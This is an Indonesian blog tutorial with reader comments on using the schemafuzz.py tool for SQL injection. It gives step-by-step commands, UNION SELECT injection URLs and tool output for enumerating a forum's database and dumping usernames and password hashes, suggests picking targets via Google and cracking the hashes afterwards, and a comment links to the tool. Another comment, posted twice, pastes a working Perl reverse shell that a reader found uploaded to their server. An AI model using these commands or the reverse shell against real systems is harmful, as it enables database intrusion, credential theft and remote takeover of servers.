Tutorial SQL Injection dengan Menggunakan Schemafuzz

----------------------------------------------------- Author : Andr3^81 e-Mail : andr3-81 [at] linuxmail [dot] org website : http://andr381.tk Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi. ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut pertama-tama kita cari target dengan google dan ditemukan: misalnya http://127.0.0.1/site/phpweb/forum.php?forum=1 sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan. caranya seperti ini ./schemafuzz.py -h help kita temukan sebagian perintahnya seperti ini --schema, --dbs, --dump, --fuzz, --info, --full, --findcol langkah pertama ---------------- ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol diperoleh seperti ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1-- [+] Evasion Used: "+" "--" [+] 01:32:04 [+] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2,3,4,5, [+] Column Length is: 6 [+] Found null column at column #: 1 [+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5-- [+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5 [-] Done! langkah kedua -------------- setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz diperoleh seperti ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5-- [+] Evasion Used: "+" "--" [+] 01:37:09 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: webthings User: testing@localhost Version: 5.0.51a [+] Number of tables names to be fuzzed: 354 [+] Number of column names to be fuzzed: 263 [+] Searching for tables and columns... [+] Found a table called: mysql.user [+] Now searching for columns inside table "mysql.user" [!] Found a column called:user [!] Found a column called:password [-] Done searching inside table "mysql.user" for columns! [-] [01:37:48] [-] Total URL Requests 618 [-] Done langkah ketiga --------------- Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5-- [+] Evasion Used: "+" "--" [+] 01:43:11 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: webthings User: testing@localhost Version: 5.0.51a [+] Showing Tables & Columns from database "webthings" [+] Number of Tables: 33 [Database]: webthings [Table: Columns] [0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views [1]wt_articles_title: article_id,category,title,active,date,userid,views [2]wt_articlescat: cod,category [3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date [4]wt_banners_log: banner,date,views,clicks,sessions [5]wt_banners_rawlog: banner,type,date,session [6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box [7]wt_comments: cod,type,link,date,userid,comment [8]wt_config: id,config [9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text [10]wt_downloadscat: cod,ref,name,descr [11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer [12]wt_faq_topics: cod,name [13]wt_forum_log_topics: uid,msgid,logtime,notifysent [14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies [15]wt_forums: cod,title,descr,locked,notifies,register [16]wt_forums_mod: forum,userid,type [17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst [18]wt_links: id,category,active,name,url,count,descr,obs [19]wt_linkscat: cod,name,descr,parent_id [20]wt_menu: id,pos,title,url,type,newwindow,lang [21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos [22]wt_newscat: cod,name,image [23]wt_online: id,time,uid [24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks [25]wt_picofdaycat: id,name,description [26]wt_picofdaysel: date,picture_id,views,clicks [27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10 [28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules [29]wt_user_access: userid,module [30]wt_user_book: userid,cod_user [31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify [32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments, newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail [-] [01:43:48] [-] Total URL Requests 270 [-] Done untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info maka akan tampil seperti ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5-- [+] Evasion Used: "+" "--" [+] 01:46:51 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: webthings User: testing@localhost Version: 5.0.51a [+] Do we have Access to MySQL Database: Yes <-- w00t w00t [!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user-- [+] Do we have Access to Load_File: No [-] [01:46:51] [-] Total URL Requests 3 [-] Done ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs akan tampil seperti ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5-- [+] Evasion Used: "+" "--" [+] 01:58:15 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: webthings User: testing@localhost Version: 5.0.51a [+] Showing all databases current user has access too! [+] Number of Databases: 1 [0]webthings [-] [01:58:17] [-] Total URL Requests 30 [-] Done langkah selanjutnya -------------------- cara untuk menemukan user dan password kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password eing ing eng.... jreennnng....keluar deh user ama passwordnya hasilnya dibawah ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5-- [+] Evasion Used: "+" "--" [+] 02:08:47 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: webthings User: testing@localhost Version: 5.0.51a [+] Dumping data from database "webthings" Table "wt_users" [+] Column(s) ['name', 'password'] [+] Number of Rows: 2 [0] admin:e00b29d5b34c3f78df09d45921c9ec47: [1] user:098f6bcd4621d373cade4e832627b4f6: [-] [02:08:48] [-] Total URL Requests 4 [-] Done jangan lupa kita selalu mengecek schemafuzzlog.txt nya setelah itu tinggal kita meng crack passwordnya pake program gemana rekan2 gampang kan pake schemafuzz Call: www.KeDaiComputerworks.com sasa - Desember 6, 2008 bro...schemafuzzy ntuh dpt ny dmn..?? bs jalan di windows ga..? fervo - Desember 6, 2008 ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol <---- ne d jalankan dm kk??? masih bingung ne........ fervo - Desember 6, 2008 apa di shell?????? fervo - Desember 7, 2008 kk saya mau tanya...setelah saya install python serta schemafuzz,lalu waktu saya jalankan schemafuzznya kok kluar invalid erorr yah ???/ apa schemafuzznya yg ga kebaca ma windows d kompi saya atau gmn ya kk????? mohon pencerahannya andre81 - Desember 9, 2008 kalo mo download schemafuzz disini http://darkc0de.com/others/schemafuzz.py kalo mo download python for windows http://www.python.org/ftp/python/2.5/python-2.5.msi kalo pake yang versi 3 akan error hasilnya semoga membantu andre81 - Desember 9, 2008 bro...schemafuzzy ntuh dpt ny dmn..?? bs jalan di windows ga..? bisa jalan diwindows bro linknya udah disertakan diatas andre81 - Desember 9, 2008 apa di shell?????? di shell jg bisa tapi harus install prgram python dulu baru bisa dijalankan schemafuzznya p1T4qH - Desember 9, 2008 sEeePzz, aNe jd tambah ngerti share truz andre... newbee - Desember 9, 2008 bener2 cuakep tutorialnya mywisdom - Desember 16, 2008 trims farhan1979 - Desember 17, 2008 sukses selalu bos www.peluangusahasekarang.blogspot.com farhan1979 - Desember 17, 2008 SUKSES SELALU WWW.PELUANGUSAHASEKARANG..BLOGSPOT.COM andre81 - Desember 19, 2008 lho kok ada yang ngiklan ya?? seroja - Desember 23, 2008 @andre81 thanks for info.. apa kabar neh ..? lama tak bersua ID YM nya apa neh ..? -shakeHand- faisalrayhand - Januari 21, 2009 boss buka pasword nya pakai program apa and download nya dmn..? trimakasih dengan senang hati sekali apa bila jawabanya di kirim ke email saya faisalrayhand@yahoo.com hillboy83 - Januari 29, 2009 keren bgt bozz...gw cb ahh...ID YM nya apa ne BOZZ rhandyzz - Februari 17, 2009 hlo buat hack fs gimana????????????????????//////// motaro44 - Februari 24, 2009 maf mas Q pgen lbih ditel lagi.. tolong kace k' email Q mas The_gank_star@yahoo.com plizzzzz Q pgen blazar... mazdan - Juli 29, 2009 webserver saya ditembus, ada yg tahu gak dia upload ini: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $! "); $paddr=sockaddr_in($port, $iaddr) || die("Error: $! "); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! "); connect(SOCKET, $paddr) || die("Error: $! "); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); mazdan - Juli 29, 2009 webserver saya ditembus, ada yg tahu gak dia upload ini: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $! "); $paddr=sockaddr_in($port, $iaddr) || die("Error: $! "); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! "); connect(SOCKET, $paddr) || die("Error: $! "); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); Anda harus terdaftar untuk mengirimkan komentar.
	Copyright (c) Jasakom